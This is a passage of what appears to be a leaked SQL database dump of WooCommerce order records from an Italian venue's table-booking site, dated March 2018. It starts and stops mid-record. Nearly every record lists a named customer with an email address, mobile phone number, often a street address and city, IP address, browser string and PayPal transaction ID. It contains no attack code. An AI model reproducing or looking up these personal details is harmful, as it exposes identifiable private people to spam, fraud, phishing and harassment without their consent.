name','ranieri'),(12359,669,'Payer last name','niccoli'),(12360,669,'Payment type','instant'),(12361,669,'_paypal_status','completed'),(12362,669,'_download_permissions_granted','yes'),(12363,669,'_recorded_sales','yes'),(12364,669,'_recorded_coupon_usage_counts','yes'),(12365,669,'_order_stock_reduced','yes'),(12366,669,'PayPal Transaction Fee','4.60'),(12367,670,'_order_key','wc_order_5aba0eda88239'),(12368,670,'_customer_user','0'),(12369,670,'_payment_method','paypal'),(12370,670,'_payment_method_title','PayPal'),(12371,670,'_transaction_id','4AW90856SW3125019'),(12372,670,'_customer_ip_address','2.32.87.98'),(12373,670,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(12374,670,'_created_via','checkout'),(12375,670,'_date_completed',''),(12376,670,'_completed_date',''),(12377,670,'_date_paid','1522142966'),(12378,670,'_paid_date','2018-03-27 11:29:26'),(12379,670,'_cart_hash','6f14b172f04b74dac29c5aa760d85d85'),(12380,670,'_billing_first_name','Kevin'),(12381,670,'_billing_last_name','Bravi'),(12382,670,'_billing_company',''),(12383,670,'_billing_address_1',''),(12384,670,'_billing_address_2',''),(12385,670,'_billing_city','Forlì'),(12386,670,'_billing_state',''),(12387,670,'_billing_postcode',''),(12388,670,'_billing_country',''),(12389,670,'_billing_email','k.bravi@xsmilano.it'),(12390,670,'_billing_phone','3333278873'),(12391,670,'_shipping_first_name',''),(12392,670,'_shipping_last_name',''),(12393,670,'_shipping_company',''),(12394,670,'_shipping_address_1',''),(12395,670,'_shipping_address_2',''),(12396,670,'_shipping_city',''),(12397,670,'_shipping_state',''),(12398,670,'_shipping_postcode',''),(12399,670,'_shipping_country',''),(12400,670,'_order_currency','EUR'),(12401,670,'_cart_discount','0'),(12402,670,'_cart_discount_tax','0'),(12403,670,'_order_shipping','0.00'),(12404,670,'_order_shipping_tax','0'),(12405,670,'_order_tax','0'),(12406,670,'_order_total','150.00'),(12407,670,'_order_version','3.3.4'),(12408,670,'_prices_include_tax','no'),(12409,670,'_billing_address_index','Kevin Bravi    Forlì    k.bravi@xsmilano.it 3333278873'),(12410,670,'_shipping_address_index','        '),(12411,670,'Indicare in caso di prenotazione tavolo. Quanti adulti?','6'),(12412,670,'Numero bambini fino a 6 anni','0'),(12413,670,'Numero ragazzi fino a 13 anni','0'),(12414,670,'Files attached','[]'),(12415,670,'Payer PayPal address','k.bravi@xsmilano.it'),(12416,670,'Payer first name','Kevin'),(12417,670,'Payer last name','Bravi'),(12418,670,'Payment type','instant'),(12419,670,'_paypal_status','completed'),(12420,670,'_download_permissions_granted','yes'),(12421,670,'_recorded_sales','yes'),(12422,670,'_recorded_coupon_usage_counts','yes'),(12423,670,'_order_stock_reduced','yes'),(12424,670,'PayPal Transaction Fee','5.45'),(12425,671,'_order_key','wc_order_5aba97b117f2a'),(12426,671,'_customer_user','0'),(12427,671,'_payment_method','paypal'),(12428,671,'_payment_method_title','PayPal'),(12429,671,'_transaction_id','3LR94837MA594845M'),(12430,671,'_customer_ip_address','93.47.231.16'),(12431,671,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(12432,671,'_created_via','checkout'),(12433,671,'_date_completed',''),(12434,671,'_completed_date',''),(12435,671,'_date_paid','1522178150'),(12436,671,'_paid_date','2018-03-27 21:15:50'),(12437,671,'_cart_hash','2733ec7883ed4250262341065aeeca4b'),(12438,671,'_billing_first_name','claudio'),(12439,671,'_billing_last_name','marcelli'),(12440,671,'_billing_company',''),(12441,671,'_billing_address_1','vicolo del torrione 2'),(12442,671,'_billing_address_2',''),(12443,671,'_billing_city','pieve santo stefano'),(12444,671,'_billing_state',''),(12445,671,'_billing_postcode',''),(12446,671,'_billing_country',''),(12447,671,'_billing_email','claudio.marcelli65@gmail.com'),(12448,671,'_billing_phone','3939561522'),(12449,671,'_shipping_first_name',''),(12450,671,'_shipping_last_name',''),(12451,671,'_shipping_company',''),(12452,671,'_shipping_address_1',''),(12453,671,'_shipping_address_2',''),(12454,671,'_shipping_city',''),(12455,671,'_shipping_state',''),(12456,671,'_shipping_postcode',''),(12457,671,'_shipping_country',''),(12458,671,'_order_currency','EUR'),(12459,671,'_cart_discount','0'),(12460,671,'_cart_discount_tax','0'),(12461,671,'_order_shipping','0.00'),(12462,671,'_order_shipping_tax','0'),(12463,671,'_order_tax','0'),(12464,671,'_order_total','75.00'),(12465,671,'_order_version','3.3.4'),(12466,671,'_prices_include_tax','no'),(12467,671,'_billing_address_index','claudio marcelli  vicolo del torrione 2  pieve santo stefano    claudio.marcelli65@gmail.com 3939561522'),(12468,671,'_shipping_address_index','        '),(12469,671,'Indicare in caso di prenotazione tavolo. Quanti adulti?','3'),(12470,671,'Numero bambini fino a 6 anni','0'),(12471,671,'Numero ragazzi fino a 13 anni','0'),(12472,671,'Files attached','[]'),(12473,671,'Payer PayPal address','claudio.marcelli65@gmail.com'),(12474,671,'Payer first name','claudio'),(12475,671,'Payer last name','marcelli'),(12476,671,'Payment type','instant'),(12477,671,'_paypal_status','completed'),(12478,671,'_download_permissions_granted','yes'),(12479,671,'_recorded_sales','yes'),(12480,671,'_recorded_coupon_usage_counts','yes'),(12481,671,'_order_stock_reduced','yes'),(12482,671,'PayPal Transaction Fee','2.90'),(12483,672,'_order_key','wc_order_5abb4375bdf40'),(12484,672,'_customer_user','0'),(12485,672,'_payment_method','paypal'),(12486,672,'_payment_method_title','PayPal'),(12487,672,'_transaction_id','7VA51735PJ825534K'),(12488,672,'_customer_ip_address','79.8.85.54'),(12489,672,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(12490,672,'_created_via','checkout'),(12491,672,'_date_completed',''),(12492,672,'_completed_date',''),(12493,672,'_date_paid','1522222164'),(12494,672,'_paid_date','2018-03-28 09:29:24'),(12495,672,'_cart_hash','4b382bd1c0ff6f3a591c58262de178b1'),(12496,672,'_billing_first_name','Sebastiano'),(12497,672,'_billing_last_name','Massi'),(12498,672,'_billing_company',''),(12499,672,'_billing_address_1','Via dei lecci, 5'),(12500,672,'_billing_address_2',''),(12501,672,'_billing_city','Città di castello'),(12502,672,'_billing_state',''),(12503,672,'_billing_postcode',''),(12504,672,'_billing_country',''),(12505,672,'_billing_email','riccardomassi@libero.it'),(12506,672,'_billing_phone','3933320620'),(12507,672,'_shipping_first_name',''),(12508,672,'_shipping_last_name',''),(12509,672,'_shipping_company',''),(12510,672,'_shipping_address_1',''),(12511,672,'_shipping_address_2',''),(12512,672,'_shipping_city',''),(12513,672,'_shipping_state',''),(12514,672,'_shipping_postcode',''),(12515,672,'_shipping_country',''),(12516,672,'_order_currency','EUR'),(12517,672,'_cart_discount','0'),(12518,672,'_cart_discount_tax','0'),(12519,672,'_order_shipping','0.00'),(12520,672,'_order_shipping_tax','0'),(12521,672,'_order_tax','0'),(12522,672,'_order_total','100.00'),(12523,672,'_order_version','3.3.4'),(12524,672,'_prices_include_tax','no'),(12525,672,'_billing_address_index','Sebastiano Massi  Via dei lecci, 5  Città di castello    riccardomassi@libero.it 3933320620'),(12526,672,'_shipping_address_index','        '),(12527,672,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12528,672,'Numero bambini fino a 6 anni','1'),(12529,672,'Numero ragazzi fino a 13 anni','1'),(12530,672,'Files attached','[]'),(12531,672,'Payer PayPal address','riccardomassi@libero.it'),(12532,672,'Payer first name','Sebastiano'),(12533,672,'Payer last name','Massi'),(12534,672,'Payment type','instant'),(12535,672,'_paypal_status','completed'),(12536,672,'_download_permissions_granted','yes'),(12537,672,'_recorded_sales','yes'),(12538,672,'_recorded_coupon_usage_counts','yes'),(12539,672,'_order_stock_reduced','yes'),(12540,672,'PayPal Transaction Fee','3.75'),(12541,673,'_order_key','wc_order_5abbe41201125'),(12542,673,'_customer_user','0'),(12543,673,'_payment_method','paypal'),(12544,673,'_payment_method_title','PayPal'),(12545,673,'_transaction_id','38162103MY375142U'),(12546,673,'_customer_ip_address','5.90.145.160'),(12547,673,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(12548,673,'_created_via','checkout'),(12549,673,'_date_completed',''),(12550,673,'_completed_date',''),(12551,673,'_date_paid','1522265714'),(12552,673,'_paid_date','2018-03-28 21:35:14'),(12553,673,'_cart_hash','6f14b172f04b74dac29c5aa760d85d85'),(12554,673,'_billing_first_name','BERTI'),(12555,673,'_billing_last_name','BERTI'),(12556,673,'_billing_company',''),(12557,673,'_billing_address_1',''),(12558,673,'_billing_address_2',''),(12559,673,'_billing_city',''),(12560,673,'_billing_state',''),(12561,673,'_billing_postcode',''),(12562,673,'_billing_country',''),(12563,673,'_billing_email','Nicolasberti@hotmail.it'),(12564,673,'_billing_phone','3280041978'),(12565,673,'_shipping_first_name',''),(12566,673,'_shipping_last_name',''),(12567,673,'_shipping_company',''),(12568,673,'_shipping_address_1',''),(12569,673,'_shipping_address_2',''),(12570,673,'_shipping_city',''),(12571,673,'_shipping_state',''),(12572,673,'_shipping_postcode',''),(12573,673,'_shipping_country',''),(12574,673,'_order_currency','EUR'),(12575,673,'_cart_discount','0'),(12576,673,'_cart_discount_tax','0'),(12577,673,'_order_shipping','0.00'),(12578,673,'_order_shipping_tax','0'),(12579,673,'_order_tax','0'),(12580,673,'_order_total','150.00'),(12581,673,'_order_version','3.3.4'),(12582,673,'_prices_include_tax','no'),(12583,673,'_billing_address_index','BERTI BERTI        Nicolasberti@hotmail.it 3280041978'),(12584,673,'_shipping_address_index','        '),(12585,673,'Indicare in caso di prenotazione tavolo. Quanti adulti?','6'),(12586,673,'Numero bambini fino a 6 anni','0'),(12587,673,'Numero ragazzi fino a 13 anni','0'),(12588,673,'Files attached','[]'),(12589,673,'Payer PayPal address','Nicolasberti@hotmail.it'),(12590,673,'Payer first name','BERTI'),(12591,673,'Payer last name','BERTI'),(12592,673,'Payment type','instant'),(12593,673,'_paypal_status','completed'),(12594,673,'_download_permissions_granted','yes'),(12595,673,'_recorded_sales','yes'),(12596,673,'_recorded_coupon_usage_counts','yes'),(12597,673,'_order_stock_reduced','yes'),(12598,673,'PayPal Transaction Fee','5.45'),(12599,674,'_order_key','wc_order_5abc0d0dd1cee'),(12600,674,'_customer_user','28'),(12601,674,'_payment_method','paypal'),(12602,674,'_payment_method_title','PayPal'),(12603,674,'_transaction_id',''),(12604,674,'_customer_ip_address','31.156.183.5'),(12605,674,'_customer_user_agent','mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(12606,674,'_created_via','checkout'),(12607,674,'_date_completed',''),(12608,674,'_completed_date',''),(12609,674,'_date_paid',''),(12610,674,'_paid_date',''),(12611,674,'_cart_hash','40583e8a75ab1a0baa87aadc0694a9c8'),(12612,674,'_billing_first_name','FABIO'),(12613,674,'_billing_last_name','DAVOLI'),(12614,674,'_billing_company',''),(12615,674,'_billing_address_1','Via Vaglie n.15'),(12616,674,'_billing_address_2',''),(12617,674,'_billing_city','ALBINEA'),(12618,674,'_billing_state',''),(12619,674,'_billing_postcode',''),(12620,674,'_billing_country',''),(12621,674,'_billing_email','davolifabio75@gmail.com'),(12622,674,'_billing_phone','3472522686'),(12623,674,'_shipping_first_name',''),(12624,674,'_shipping_last_name',''),(12625,674,'_shipping_company',''),(12626,674,'_shipping_address_1',''),(12627,674,'_shipping_address_2',''),(12628,674,'_shipping_city',''),(12629,674,'_shipping_state',''),(12630,674,'_shipping_postcode',''),(12631,674,'_shipping_country',''),(12632,674,'_order_currency','EUR'),(12633,674,'_cart_discount','0'),(12634,674,'_cart_discount_tax','0'),(12635,674,'_order_shipping','0.00'),(12636,674,'_order_shipping_tax','0'),(12637,674,'_order_tax','0'),(12638,674,'_order_total','100.00'),(12639,674,'_order_version','3.3.4'),(12640,674,'_prices_include_tax','no'),(12641,674,'_billing_address_index','FABIO DAVOLI  Via Vaglie n.15  ALBINEA    davolifabio75@gmail.com 3472522686'),(12642,674,'_shipping_address_index','        '),(12643,674,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12644,674,'Numero bambini fino a 6 anni','1'),(12645,674,'Numero ragazzi fino a 13 anni','1'),(12646,674,'Files attached','[]'),(12647,675,'_order_key','wc_order_5abc9df0520a8'),(12648,675,'_customer_user','0'),(12649,675,'_payment_method','paypal'),(12650,675,'_payment_method_title','PayPal'),(12651,675,'_transaction_id','2PH56278UX832780H'),(12652,675,'_customer_ip_address','87.16.247.132'),(12653,675,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_13_3) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(12654,675,'_created_via','checkout'),(12655,675,'_date_completed',''),(12656,675,'_completed_date',''),(12657,675,'_date_paid','1522310677'),(12658,675,'_paid_date','2018-03-29 10:04:37'),(12659,675,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(12660,675,'_billing_first_name','Simone'),(12661,675,'_billing_last_name','Spina'),(12662,675,'_billing_company',''),(12663,675,'_billing_address_1','Via Tavoleto 80'),(12664,675,'_billing_address_2',''),(12665,675,'_billing_city','Misano Adriatico'),(12666,675,'_billing_state',''),(12667,675,'_billing_postcode',''),(12668,675,'_billing_country',''),(12669,675,'_billing_email','simone.spina911@gmail.com'),(12670,675,'_billing_phone','3355281218'),(12671,675,'_shipping_first_name',''),(12672,675,'_shipping_last_name',''),(12673,675,'_shipping_company',''),(12674,675,'_shipping_address_1',''),(12675,675,'_shipping_address_2',''),(12676,675,'_shipping_city',''),(12677,675,'_shipping_state',''),(12678,675,'_shipping_postcode',''),(12679,675,'_shipping_country',''),(12680,675,'_order_currency','EUR'),(12681,675,'_cart_discount','0'),(12682,675,'_cart_discount_tax','0'),(12683,675,'_order_shipping','0.00'),(12684,675,'_order_shipping_tax','0'),(12685,675,'_order_tax','0'),(12686,675,'_order_total','50.00'),(12687,675,'_order_version','3.3.4'),(12688,675,'_prices_include_tax','no'),(12689,675,'_billing_address_index','Simone Spina  Via Tavoleto 80  Misano Adriatico    simone.spina911@gmail.com 3355281218'),(12690,675,'_shipping_address_index','        '),(12691,675,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12692,675,'Numero bambini fino a 6 anni','0'),(12693,675,'Numero ragazzi fino a 13 anni','0'),(12694,675,'Files attached','[]'),(12695,675,'Payer PayPal address','simone.spina911@gmail.com'),(12696,675,'Payer first name','Simone'),(12697,675,'Payer last name','Spina'),(12698,675,'Payment type','instant'),(12699,675,'_paypal_status','completed'),(12700,675,'_download_permissions_granted','yes'),(12701,675,'_recorded_sales','yes'),(12702,675,'_recorded_coupon_usage_counts','yes'),(12703,675,'_order_stock_reduced','yes'),(12704,675,'PayPal Transaction Fee','2.05'),(12705,676,'_order_key','wc_order_5abcce67b13b4'),(12706,676,'_customer_user','29'),(12707,676,'_payment_method','paypal'),(12708,676,'_payment_method_title','PayPal'),(12709,676,'_transaction_id','66334774PA267821G'),(12710,676,'_customer_ip_address','158.148.94.226'),(12711,676,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_1 like mac os x) applewebkit/604.4.7 (khtml, like gecko) version/11.0 mobile/15c153 safari/604.1'),(12712,676,'_created_via','checkout'),(12713,676,'_date_completed',''),(12714,676,'_completed_date',''),(12715,676,'_date_paid','1522323085'),(12716,676,'_paid_date','2018-03-29 13:31:25'),(12717,676,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(12718,676,'_billing_first_name','Giorgia'),(12719,676,'_billing_last_name','Merighi'),(12720,676,'_billing_company',''),(12721,676,'_billing_address_1',''),(12722,676,'_billing_address_2',''),(12723,676,'_billing_city',''),(12724,676,'_billing_state',''),(12725,676,'_billing_postcode',''),(12726,676,'_billing_country',''),(12727,676,'_billing_email','MerighiGiorgia@gmail.com'),(12728,676,'_billing_phone','3476992944'),(12729,676,'_shipping_first_name',''),(12730,676,'_shipping_last_name',''),(12731,676,'_shipping_company',''),(12732,676,'_shipping_address_1',''),(12733,676,'_shipping_address_2',''),(12734,676,'_shipping_city',''),(12735,676,'_shipping_state',''),(12736,676,'_shipping_postcode',''),(12737,676,'_shipping_country',''),(12738,676,'_order_currency','EUR'),(12739,676,'_cart_discount','0'),(12740,676,'_cart_discount_tax','0'),(12741,676,'_order_shipping','0.00'),(12742,676,'_order_shipping_tax','0'),(12743,676,'_order_tax','0'),(12744,676,'_order_total','50.00'),(12745,676,'_order_version','3.3.4'),(12746,676,'_prices_include_tax','no'),(12747,676,'_billing_address_index','Giorgia Merighi        MerighiGiorgia@gmail.com 3476992944'),(12748,676,'_shipping_address_index','        '),(12749,676,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12750,676,'Numero bambini fino a 6 anni','0'),(12751,676,'Numero ragazzi fino a 13 anni','0'),(12752,676,'Files attached','[]'),(12753,676,'Payer PayPal address','merighigiorgia@gmail.com'),(12754,676,'Payer first name','Giorgia'),(12755,676,'Payer last name','Merighi'),(12756,676,'Payment type','instant'),(12757,676,'_paypal_status','completed'),(12758,676,'_download_permissions_granted','yes'),(12759,676,'_recorded_sales','yes'),(12760,676,'_recorded_coupon_usage_counts','yes'),(12761,676,'_order_stock_reduced','yes'),(12762,676,'PayPal Transaction Fee','2.05'),(12763,677,'_order_key','wc_order_5abd0d5b99cfe'),(12764,677,'_customer_user','0'),(12765,677,'_payment_method','paypal'),(12766,677,'_payment_method_title','PayPal'),(12767,677,'_transaction_id','4CV27176L4430715D'),(12768,677,'_customer_ip_address','95.240.170.44'),(12769,677,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; rv:11.0) like gecko'),(12770,677,'_created_via','checkout'),(12771,677,'_date_completed',''),(12772,677,'_completed_date',''),(12773,677,'_date_paid','1522339281'),(12774,677,'_paid_date','2018-03-29 18:01:21'),(12775,677,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(12776,677,'_billing_first_name','Marco'),(12777,677,'_billing_last_name','Rossi'),(12778,677,'_billing_company',''),(12779,677,'_billing_address_1','via gaddi 62'),(12780,677,'_billing_address_2',''),(12781,677,'_billing_city','Modena'),(12782,677,'_billing_state',''),(12783,677,'_billing_postcode',''),(12784,677,'_billing_country',''),(12785,677,'_billing_email','marco@avvmarcorossi.it'),(12786,677,'_billing_phone','335.327680'),(12787,677,'_shipping_first_name',''),(12788,677,'_shipping_last_name',''),(12789,677,'_shipping_company',''),(12790,677,'_shipping_address_1',''),(12791,677,'_shipping_address_2',''),(12792,677,'_shipping_city',''),(12793,677,'_shipping_state',''),(12794,677,'_shipping_postcode',''),(12795,677,'_shipping_country',''),(12796,677,'_order_currency','EUR'),(12797,677,'_cart_discount','0'),(12798,677,'_cart_discount_tax','0'),(12799,677,'_order_shipping','0.00'),(12800,677,'_order_shipping_tax','0'),(12801,677,'_order_tax','0'),(12802,677,'_order_total','50.00'),(12803,677,'_order_version','3.3.4'),(12804,677,'_prices_include_tax','no'),(12805,677,'_billing_address_index','Marco Rossi  via gaddi 62  Modena    marco@avvmarcorossi.it 335.327680'),(12806,677,'_shipping_address_index','        '),(12807,677,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12808,677,'Numero bambini fino a 6 anni','0'),(12809,677,'Numero ragazzi fino a 13 anni','0'),(12810,677,'Files attached','[]'),(12811,677,'Payer PayPal address','marco@avvmarcorossi.it'),(12812,677,'Payer first name','Marco'),(12813,677,'Payer last name','Rossi'),(12814,677,'Payment type','instant'),(12815,677,'_paypal_status','completed'),(12816,677,'_download_permissions_granted','yes'),(12817,677,'_recorded_sales','yes'),(12818,677,'_recorded_coupon_usage_counts','yes'),(12819,677,'_order_stock_reduced','yes'),(12820,677,'PayPal Transaction Fee','2.05'),(12821,678,'_order_key','wc_order_5abe0ce861085'),(12822,678,'_customer_user','0'),(12823,678,'_payment_method','paypal'),(12824,678,'_payment_method_title','PayPal'),(12825,678,'_transaction_id','6C6287827M816540J'),(12826,678,'_customer_ip_address','2.39.210.124'),(12827,678,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(12828,678,'_created_via','checkout'),(12829,678,'_date_completed',''),(12830,678,'_completed_date',''),(12831,678,'_date_paid','1522404770'),(12832,678,'_paid_date','2018-03-30 12:12:50'),(12833,678,'_cart_hash','4b382bd1c0ff6f3a591c58262de178b1'),(12834,678,'_billing_first_name','Massimiliano'),(12835,678,'_billing_last_name','Bazzi'),(12836,678,'_billing_company',''),(12837,678,'_billing_address_1','Via Zagarelli alle mura 30'),(12838,678,'_billing_address_2',''),(12839,678,'_billing_city','Ravenna'),(12840,678,'_billing_state',''),(12841,678,'_billing_postcode',''),(12842,678,'_billing_country',''),(12843,678,'_billing_email','maxtexsrls@gmail.com'),(12844,678,'_billing_phone','335430460'),(12845,678,'_shipping_first_name',''),(12846,678,'_shipping_last_name',''),(12847,678,'_shipping_company',''),(12848,678,'_shipping_address_1',''),(12849,678,'_shipping_address_2',''),(12850,678,'_shipping_city',''),(12851,678,'_shipping_state',''),(12852,678,'_shipping_postcode',''),(12853,678,'_shipping_country',''),(12854,678,'_order_currency','EUR'),(12855,678,'_cart_discount','0'),(12856,678,'_cart_discount_tax','0'),(12857,678,'_order_shipping','0.00'),(12858,678,'_order_shipping_tax','0'),(12859,678,'_order_tax','0'),(12860,678,'_order_total','100.00'),(12861,678,'_order_version','3.3.4'),(12862,678,'_prices_include_tax','no'),(12863,678,'_billing_address_index','Massimiliano Bazzi  Via Zagarelli alle mura 30  Ravenna    maxtexsrls@gmail.com 335430460'),(12864,678,'_shipping_address_index','        '),(12865,678,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(12866,678,'Numero bambini fino a 6 anni','0'),(12867,678,'Numero ragazzi fino a 13 anni','0'),(12868,678,'Files attached','[]'),(12869,678,'Payer PayPal address','maxtexsrls@gmail.com'),(12870,678,'Payer first name','Massimiliano'),(12871,678,'Payer last name','Bazzi'),(12872,678,'Payment type','instant'),(12873,678,'_paypal_status','completed'),(12874,678,'_download_permissions_granted','yes'),(12875,678,'_recorded_sales','yes'),(12876,678,'_recorded_coupon_usage_counts','yes'),(12877,678,'_order_stock_reduced','yes'),(12878,678,'PayPal Transaction Fee','3.75'),(12879,679,'_order_key','wc_order_5abe4ea9ea725'),(12880,679,'_customer_user','30'),(12881,679,'_payment_method','paypal'),(12882,679,'_payment_method_title','PayPal'),(12883,679,'_transaction_id','8EV794320C3007728'),(12884,679,'_customer_ip_address','79.16.195.215'),(12885,679,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(12886,679,'_created_via','checkout'),(12887,679,'_date_completed',''),(12888,679,'_completed_date',''),(12889,679,'_date_paid','1522421513'),(12890,679,'_paid_date','2018-03-30 16:51:53'),(12891,679,'_cart_hash','d3336598acce32391ee89c7ea89dac94'),(12892,679,'_billing_first_name','SANTICCIOLI'),(12893,679,'_billing_last_name','SANTICCIOLI'),(12894,679,'_billing_company',''),(12895,679,'_billing_address_1','RIGUTINO'),(12896,679,'_billing_address_2',''),(12897,679,'_billing_city','AREZZO'),(12898,679,'_billing_state',''),(12899,679,'_billing_postcode',''),(12900,679,'_billing_country',''),(12901,679,'_billing_email','simonesanticcioli@gmail.com'),(12902,679,'_billing_phone','3356385806'),(12903,679,'_shipping_first_name',''),(12904,679,'_shipping_last_name',''),(12905,679,'_shipping_company',''),(12906,679,'_shipping_address_1',''),(12907,679,'_shipping_address_2',''),(12908,679,'_shipping_city',''),(12909,679,'_shipping_state',''),(12910,679,'_shipping_postcode',''),(12911,679,'_shipping_country',''),(12912,679,'_order_currency','EUR'),(12913,679,'_cart_discount','0'),(12914,679,'_cart_discount_tax','0'),(12915,679,'_order_shipping','0.00'),(12916,679,'_order_shipping_tax','0'),(12917,679,'_order_tax','0'),(12918,679,'_order_total','125.00'),(12919,679,'_order_version','3.3.4'),(12920,679,'_prices_include_tax','no'),(12921,679,'_billing_address_index','SANTICCIOLI SANTICCIOLI  RIGUTINO  AREZZO    simonesanticcioli@gmail.com 3356385806'),(12922,679,'_shipping_address_index','        '),(12923,679,'Indicare in caso di prenotazione tavolo. Quanti adulti?','5'),(12924,679,'Numero bambini fino a 6 anni','0'),(12925,679,'Numero ragazzi fino a 13 anni','0'),(12926,679,'Files attached','[]'),(12927,679,'Payer PayPal address','simonesanticcioli@gmail.com'),(12928,679,'Payer first name','SANTICCIOLI'),(12929,679,'Payer last name','SANTICCIOLI'),(12930,679,'Payment type','instant'),(12931,679,'_paypal_status','completed'),(12932,679,'_download_permissions_granted','yes'),(12933,679,'_recorded_sales','yes'),(12934,679,'_recorded_coupon_usage_counts','yes'),(12935,679,'_order_stock_reduced','yes'),(12936,679,'PayPal Transaction Fee','4.60'),(12937,680,'_order_key','wc_order_5abe79a79ff5f'),(12938,680,'_customer_user','0'),(12939,680,'_payment_method','paypal'),(12940,680,'_payment_method_title','PayPal'),(12941,680,'_transaction_id','3RF368534R5105640'),(12942,680,'_customer_ip_address','188.216.197.140'),(12943,680,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(12944,680,'_created_via','checkout'),(12945,680,'_date_completed',''),(12946,680,'_completed_date',''),(12947,680,'_date_paid','1522432545'),(12948,680,'_paid_date','2018-03-30 19:55:45'),(12949,680,'_cart_hash','40583e8a75ab1a0baa87aadc0694a9c8'),(12950,680,'_billing_first_name','Alberto'),(12951,680,'_billing_last_name','Nahum'),(12952,680,'_billing_company',''),(12953,680,'_billing_address_1','Via Saragozza'),(12954,680,'_billing_address_2',''),(12955,680,'_billing_city','Bologna'),(12956,680,'_billing_state',''),(12957,680,'_billing_postcode',''),(12958,680,'_billing_country',''),(12959,680,'_billing_email','albe.nahum@gmail.com'),(12960,680,'_billing_phone','3441386722'),(12961,680,'_shipping_first_name',''),(12962,680,'_shipping_last_name',''),(12963,680,'_shipping_company',''),(12964,680,'_shipping_address_1',''),(12965,680,'_shipping_address_2',''),(12966,680,'_shipping_city',''),(12967,680,'_shipping_state',''),(12968,680,'_shipping_postcode',''),(12969,680,'_shipping_country',''),(12970,680,'_order_currency','EUR'),(12971,680,'_cart_discount','0'),(12972,680,'_cart_discount_tax','0'),(12973,680,'_order_shipping','0.00'),(12974,680,'_order_shipping_tax','0'),(12975,680,'_order_tax','0'),(12976,680,'_order_total','100.00'),(12977,680,'_order_version','3.3.4'),(12978,680,'_prices_include_tax','no'),(12979,680,'_billing_address_index','Alberto Nahum  Via Saragozza  Bologna    albe.nahum@gmail.com 3441386722'),(12980,680,'_shipping_address_index','        '),(12981,680,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(12982,680,'Numero bambini fino a 6 anni','0'),(12983,680,'Numero ragazzi fino a 13 anni','0'),(12984,680,'Files attached','[]'),(12985,680,'Payer PayPal address','albe.nahum@gmail.com'),(12986,680,'Payer first name','Alberto'),(12987,680,'Payer last name','Nahum'),(12988,680,'Payment type','instant'),(12989,680,'_paypal_status','completed'),(12990,680,'_download_permissions_granted','yes'),(12991,680,'_recorded_sales','yes'),(12992,680,'_recorded_coupon_usage_counts','yes'),(12993,680,'_order_stock_reduced','yes'),(12994,680,'PayPal Transaction Fee','3.75'),(12995,681,'_order_key','wc_order_5abe7da57b035'),(12996,681,'_customer_user','31'),(12997,681,'_payment_method','paypal'),(12998,681,'_payment_method_title','PayPal'),(12999,681,'_transaction_id','76B73515XF0613624'),(13000,681,'_customer_ip_address','188.218.94.114'),(13001,681,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(13002,681,'_created_via','checkout'),(13003,681,'_date_completed',''),(13004,681,'_completed_date',''),(13005,681,'_date_paid','1522433529'),(13006,681,'_paid_date','2018-03-30 20:12:09'),(13007,681,'_cart_hash','40583e8a75ab1a0baa87aadc0694a9c8'),(13008,681,'_billing_first_name','Santa'),(13009,681,'_billing_last_name','Harizaj'),(13010,681,'_billing_company',''),(13011,681,'_billing_address_1','Via Altaseta 2'),(13012,681,'_billing_address_2',''),(13013,681,'_billing_city','Bologna'),(13014,681,'_billing_state',''),(13015,681,'_billing_postcode',''),(13016,681,'_billing_country',''),(13017,681,'_billing_email','Santaharizaj@gmail.com'),(13018,681,'_billing_phone','3428037160'),(13019,681,'_shipping_first_name',''),(13020,681,'_shipping_last_name',''),(13021,681,'_shipping_company',''),(13022,681,'_shipping_address_1',''),(13023,681,'_shipping_address_2',''),(13024,681,'_shipping_city',''),(13025,681,'_shipping_state',''),(13026,681,'_shipping_postcode',''),(13027,681,'_shipping_country',''),(13028,681,'_order_currency','EUR'),(13029,681,'_cart_discount','0'),(13030,681,'_cart_discount_tax','0'),(13031,681,'_order_shipping','0.00'),(13032,681,'_order_shipping_tax','0'),(13033,681,'_order_tax','0'),(13034,681,'_order_total','100.00'),(13035,681,'_order_version','3.3.4'),(13036,681,'_prices_include_tax','no'),(13037,681,'_billing_address_index','Santa Harizaj  Via Altaseta 2  Bologna    Santaharizaj@gmail.com 3428037160'),(13038,681,'_shipping_address_index','        '),(13039,681,'Indicare in caso di prenotazione tavolo. Quanti 